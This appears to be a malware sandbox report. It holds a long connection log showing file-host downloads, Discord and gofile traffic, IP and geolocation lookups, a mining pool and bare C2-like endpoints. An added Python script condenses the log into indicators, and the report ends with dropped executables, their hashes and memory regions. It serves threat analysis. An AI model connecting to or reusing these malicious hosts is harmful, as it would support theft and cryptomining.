| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| FI | 135.181.121.233:1451 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | artmediastudio.ro | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RO | 176.126.201.5:80 | artmediastudio.ro | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 5.201.126.176.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | houssagynecologue.com | udp |
| US | 169.60.78.87:443 | houssagynecologue.com | tcp |
| US | 8.8.8.8:53 | resergvearyinitiani.shop | udp |
| US | 104.21.94.2:443 | resergvearyinitiani.shop | tcp |
| US | 8.8.8.8:53 | 87.78.60.169.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | antiuncontemporary.fun | udp |
| US | 8.8.8.8:53 | reechoingkaolizationp.fun | udp |
| US | 8.8.8.8:53 | mazumaponyanthus.fun | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | unexaminablespectrall.fun | udp |
| DE | 185.172.128.8:80 | 185.172.128.8 | tcp |
| US | 8.8.8.8:53 | muggierdragstemmio.fun | udp |
| US | 8.8.8.8:53 | bicyclesunhygenico.fun | udp |
| US | 8.8.8.8:53 | pielumchalotpostwo.fun | udp |
| US | 8.8.8.8:53 | fishboatnurrybeauti.fun | udp |
| US | 8.8.8.8:53 | 2.94.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.128.172.185.in-addr.arpa | udp |
| US | 169.60.78.87:443 | houssagynecologue.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | smpn41.semarangkota.go.id | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| ID | 103.101.52.6:443 | smpn41.semarangkota.go.id | tcp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 169.60.78.87:443 | houssagynecologue.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 6.52.101.103.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CZ | 62.233.57.95:80 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | ecoproducts.com.my | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 104.21.8.164:443 | ecoproducts.com.my | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | starozitnictvi-znojmo.cz | udp |
| CZ | 62.109.150.108:80 | starozitnictvi-znojmo.cz | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 164.8.21.104.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 95.143.190.57:15647 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 216.98.9.109:80 | 216.98.9.109 | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 109.9.98.216.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 45.9.74.182:80 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 159.89.100.67:7000 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | recessionconceptjetwe.pw | udp |
| US | 8.8.8.8:53 | goddirtybrilliancece.fun | udp |
| US | 8.8.8.8:53 | blastechohackopeower.pw | udp |
| US | 8.8.8.8:53 | playerweighmailydailew.pw | udp |
| US | 8.8.8.8:53 | carstirgapcheatdeposwte.pw | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| FI | 135.181.121.233:1451 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 167.132.233.193.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 185.172.128.113:80 | 185.172.128.113 | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 113.128.172.185.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 144.76.1.85:18574 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 1717.1000uc.com | udp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| GB | 79.133.176.211:80 | 1717.1000uc.com | tcp |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 31.14.70.243:443 | store2.gofile.io | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 85.1.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 243.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 1717mu.1000uc.com | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| GB | 79.133.176.213:80 | 1717mu.1000uc.com | tcp |
| US | 8.8.8.8:53 | jq.727mu.com | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CN | 153.99.234.44:33446 | jq.727mu.com | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.176.133.79.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | stdown.dinju.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| CN | 113.194.51.118:80 | stdown.dinju.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| FI | 135.181.121.233:1451 | | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 185.172.128.11:80 | 185.172.128.11 | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 11.128.172.185.in-addr.arpa | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | fr-zephyr.miningocean.org | udp |
| FR | 141.94.115.174:5342 | fr-zephyr.miningocean.org | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 174.115.94.141.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CN | 123.6.40.127:80 | stdown.dinju.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 95.143.190.57:15647 | | tcp |
| FI | 135.181.121.233:1451 | | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CN | 123.6.40.204:80 | stdown.dinju.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| FI | 135.181.121.233:1451 | | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
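The rows above are the raw connection log; what an analyst needs from them is a short list of unique destinations with the noise separated out. The following is an added example, not part of the sandbox report, that parses rows in this table's layout (country, ip:port, host, protocol, tolerating rows where an empty host column shifted the protocol cell), splits DNS queries from PTR lookups, counts TCP destinations, and isolates connections that go straight to an IP on a non-web port with no hostname. The sample rows are copied from the table; treating those direct-IP connections as candidate hardcoded C2 endpoints, and the list of shared services that should not be blocked by domain alone, are analyst heuristics, not statements made by the report.

```python
"""Summarise sandbox connection-table rows into deduplicated network indicators."""
import ipaddress
from collections import Counter

# Rows copied verbatim from the connections table (a representative subset,
# including two rows whose empty host column shifted the protocol cell left).
SAMPLE_ROWS = """\
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 113.128.172.185.in-addr.arpa | udp |
| DE | 144.76.1.85:18574 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| GB | 79.133.176.211:80 | 1717.1000uc.com | tcp |
| CN | 153.99.234.44:33446 | jq.727mu.com | tcp |
| FI | 135.181.121.233:1451 | | tcp |
| FR | 141.94.115.174:5342 | fr-zephyr.miningocean.org | tcp |
| RU | 95.143.190.57:15647 | tcp | |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
"""

WEB_PORTS = {80, 443}

# Shared services the report flags as abused (file hosts, IP-lookup and
# geolocation APIs, Discord). They show tradecraft, not attacker-owned
# infrastructure, so a plain domain block would hit legitimate traffic.
SHARED_SERVICES = {"files.catbox.moe", "api.gofile.io", "store2.gofile.io",
                   "store10.gofile.io", "api.ipify.org", "geolocation-db.com",
                   "discord.com"}


def parse_row(line):
    """Parse one `| CC | ip:port | host | proto |` row; return None for non-rows."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4:
        return None
    cc, endpoint, c3, c4 = cells
    # An empty host column sometimes shifts the protocol one cell to the left
    # ("| tcp | |"); accept both layouts.
    if c3 in ("tcp", "udp") and c4 == "":
        host, proto = "", c3
    else:
        host, proto = c3, c4
    if proto not in ("tcp", "udp"):
        return None
    ip, sep, port = endpoint.rpartition(":")
    if not sep or not port.isdigit():
        return None
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return None
    return {"cc": cc, "ip": ip, "port": int(port), "host": host, "proto": proto}


def parse_rows(text):
    return [r for r in map(parse_row, text.splitlines()) if r]


def summarize(rows):
    """Group rows into the views an analyst wants: names queried, PTR noise,
    TCP destinations with hit counts, and the non-web-port connections."""
    dns_queries, ptr_lookups = set(), set()
    tcp_destinations = Counter()
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53 and r["host"]:
            target = ptr_lookups if r["host"].endswith(".in-addr.arpa") else dns_queries
            target.add(r["host"])
        elif r["proto"] == "tcp":
            tcp_destinations[(r["ip"], r["port"], r["host"])] += 1
    # No hostname plus a non-web port is the usual shape of a hardcoded C2
    # endpoint (heuristic); named non-web destinations are kept apart so a
    # mining pool is not mistaken for one.
    direct_ip = sorted(k for k in tcp_destinations if not k[2] and k[1] not in WEB_PORTS)
    named_nonweb = sorted(k for k in tcp_destinations if k[2] and k[1] not in WEB_PORTS)
    return {"dns_queries": dns_queries, "ptr_lookups": ptr_lookups,
            "tcp_destinations": tcp_destinations,
            "direct_ip": direct_ip, "named_nonweb": named_nonweb}


def indicators(summary):
    """Split indicators into what can be blocked outright and what needs context."""
    hosts = {h for (_, _, h) in summary["tcp_destinations"] if h} | summary["dns_queries"]
    return {"hosts": sorted(hosts - SHARED_SERVICES),
            "shared_services": sorted(hosts & SHARED_SERVICES),
            "endpoints": sorted(f"{ip}:{port}" for (ip, port, _) in summary["direct_ip"])}


if __name__ == "__main__":
    s = summarize(parse_rows(SAMPLE_ROWS))
    for key, n in s["tcp_destinations"].most_common():
        print(n, *key)
    print("direct-IP non-web:", s["direct_ip"])
    print("named non-web:", s["named_nonweb"])
    print(indicators(s))
```

Run on the full table, the output is a handful of lines instead of two hundred: the bulk of the rows collapse into repeated hits on files.catbox.moe and discord.com, and the three bare IP:port endpoints and the two named non-web destinations are what remain to be investigated. The PTR lookups are kept separately because they reveal nothing beyond the IPs already in the TCP rows.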
Files
memory/1608-0-0x0000000000740000-0x0000000000748000-memory.dmp
memory/1608-1-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1608-2-0x00000000050D0000-0x000000000516C000-memory.dmp
memory/1608-3-0x0000000005240000-0x0000000005250000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
| MD5 | 86443efb8ee2289340119b5e84aad4f1 |
| SHA1 | e8b2d4cc5fcebbfe798283431073e0b78ba80f4e |
| SHA256 | 4d64bbdbca232e9efbf8770386ed39562691793c678856d6e0c0fb1dc4af5219 |
| SHA512 | 73a04ff02aaacfce3d750bb033b1213932df72f9877b014aefdb0eefc751a840f30b3e21095f90644c1d448b6da1bab7e53009053c1db5c54d57256646a1e0c5 |
C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe
| MD5 | 4fd20b83f785393e13bf3734fb9ed52f |
| SHA1 | f54a3597ec715dfab41d04f8625c343546c12e3d |
| SHA256 | 560aba847a47f07ccaaeded06dd799b134ef537d3b5239ae60df9c340d60ee33 |
| SHA512 | ec9d6fbf2327278a8fd332283b1054ae8537217f441c15863eda7ce2c9e6e2323698772d7df19c4d330b224138bdd9c80937f37dd757dd00d8dc4aa14a2ebe7e |
memory/4132-23-0x000001F340F00000-0x000001F340F0D000-memory.dmp
memory/4132-25-0x000001F340FE0000-0x000001F340FEE000-memory.dmp
memory/4132-26-0x00007FFAACD20000-0x00007FFAAD7E1000-memory.dmp
memory/4132-27-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-28-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-29-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-30-0x00007FF66FFF0000-0x00007FF670034000-memory.dmp
memory/2108-31-0x0000000002190000-0x00000000021B3000-memory.dmp
memory/1608-33-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1608-34-0x0000000005240000-0x0000000005250000-memory.dmp
memory/2108-35-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/2108-36-0x0000000004DC0000-0x0000000004E14000-memory.dmp
memory/2108-37-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/2108-38-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/2108-39-0x0000000004EC0000-0x0000000005464000-memory.dmp
memory/2108-40-0x0000000005470000-0x0000000005502000-memory.dmp
memory/4132-41-0x00007FFAACD20000-0x00007FFAAD7E1000-memory.dmp
memory/2108-42-0x00000000056B0000-0x00000000056BA000-memory.dmp
memory/2108-43-0x0000000005830000-0x0000000005E48000-memory.dmp
memory/2108-44-0x0000000005F60000-0x000000000606A000-memory.dmp
memory/2108-46-0x0000000005790000-0x00000000057CC000-memory.dmp
memory/2108-45-0x0000000005770000-0x0000000005782000-memory.dmp
memory/2108-47-0x0000000005E70000-0x0000000005EBC000-memory.dmp
memory/4132-48-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-49-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-50-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/2108-52-0x00000000745E0000-0x0000000074D90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
| MD5 | 1a917a85dcbb1d3df5f4dd02e3a62873 |
| SHA1 | 567f528fec8e7a4787f8c253446d8f1b620dc9d6 |
| SHA256 | 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e |
| SHA512 | 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec |
memory/2108-64-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/2604-65-0x0000000000690000-0x00000000008B8000-memory.dmp
memory/2604-67-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/2604-66-0x0000000005110000-0x0000000005318000-memory.dmp
memory/2604-68-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-69-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-71-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-73-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-75-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-77-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-81-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-79-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-83-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-85-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-87-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-91-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-89-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-93-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-97-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-99-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-95-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-101-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-103-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-105-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-107-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-111-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-113-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-109-0x0000000005110000-0x0000000005313000-memory.dmp
